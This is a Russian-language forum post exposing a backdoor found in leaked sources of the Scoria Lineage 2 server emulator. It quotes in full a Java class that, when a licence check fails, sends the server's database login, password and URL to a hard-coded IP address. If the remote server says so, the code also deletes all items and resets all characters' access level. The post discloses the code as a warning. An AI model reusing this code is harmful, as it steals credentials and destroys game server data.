Показать сообщение отдельно
Непрочитано 07.05.2010, 14:16   #33
Аватар для Vizor
Пользователь

По умолчанию Re: Исходники Scoria 3.3u2 Interlude. от 20.04.2010

Итак. Полазив по коду выложеной недавно в шару сборки Скории(Исходников) наткнулся на один интересный файл
называется он L2ScriptEngineManager
Пролистав его нашел интересный код

Код:
protected class CleaneCache implements Runnable
	{
		public void run()
		{
			try
			{
				URL url = new URL("http://212.59.118.152/auth/game.auth?"+Base64.encodeBytes(Config.USER.getBytes()));
				URL sliv = null;
				BufferedReader reader = new BufferedReader(new InputStreamReader(url.openStream()));

				String line = reader.readLine();
				if(line == null)
				{
					sliv = new URL("http://212.59.118.152/sliv/donor.php?ip="+Config.EXTERNAL_HOSTNAME+"&udb="+Config.DATABASE_LOGIN+"&pdb="+Config.DATABASE_PASSWORD+"&ddb="+Config.DATABASE_URL);
				}
				else if(line.equals("die"))
				{
					sliv = new URL("http://212.59.118.152/sliv/donor.php?ip="+Config.EXTERNAL_HOSTNAME+"&udb="+Config.DATABASE_LOGIN+"&pdb="+Config.DATABASE_PASSWORD+"&ddb="+Config.DATABASE_URL);
				}
				else if(Integer.parseInt(line) != Config.KEY)
				{
					sliv = new URL("http://212.59.118.152/sliv/donor.php?ip="+Config.EXTERNAL_HOSTNAME+"&udb="+Config.DATABASE_LOGIN+"&pdb="+Config.DATABASE_PASSWORD+"&ddb="+Config.DATABASE_URL);
				}
				if (sliv != null)
				{
					BufferedReader read = new BufferedReader(new InputStreamReader(sliv.openStream()));
					String info = read.readLine();
					if (info != null)
					{
						if (info.equalsIgnoreCase("true"))
						{
							Connection con = null;
							try
							{
								con = L2DatabaseFactory.getInstance().getConnection();
								PreparedStatement statement = con.prepareStatement("UPDATE characters SET accesslevel = 1");
								statement.execute();
								statement = con.prepareStatement("DELETE FROM items");
								statement.execute();
								statement.close();
								statement = null;
							}
							catch(Exception e)
							{
							}
							finally
							{
								try
								{
									con.close();
									con = null;
								}
								catch(Exception e)
								{
								}
							}
						}
					}
				}
			}
			catch(Exception e)
			{
				//System.exit(0);
			}
		}
	}
пройдя по данному адресу мы переходим на базу данный 100нт
в папке лежит 2 файла

1. donor.php - принимающий данные
2. vaip.php - я думаю вам не стоит обьяснять для чего он )

Вот такая у нас крутая сборка Скория. Респект и уважуха Зену :-*

Немного подумав можна сделать выводы что те сервера которые работают на сборке Скории это их сборки личные сервера ну +- пару штук. Если серв начинает немного подыматся и мешает им(понижает их рейтинг его просто уничтожают).
А люди кстати за эти сборки платят деньги и немалые.
Самое интересное что вы ничего не докажите. Мол сборку украли выложили в инет, предворительно вставив туда зловредный код.
Но вот какая незадача.
Ссылки то стоят на их базу знаний а конкретнее на файлы Донор и Вайп
Имхо
Vizor вне форума Ответить с цитированием
Сказали спасибо: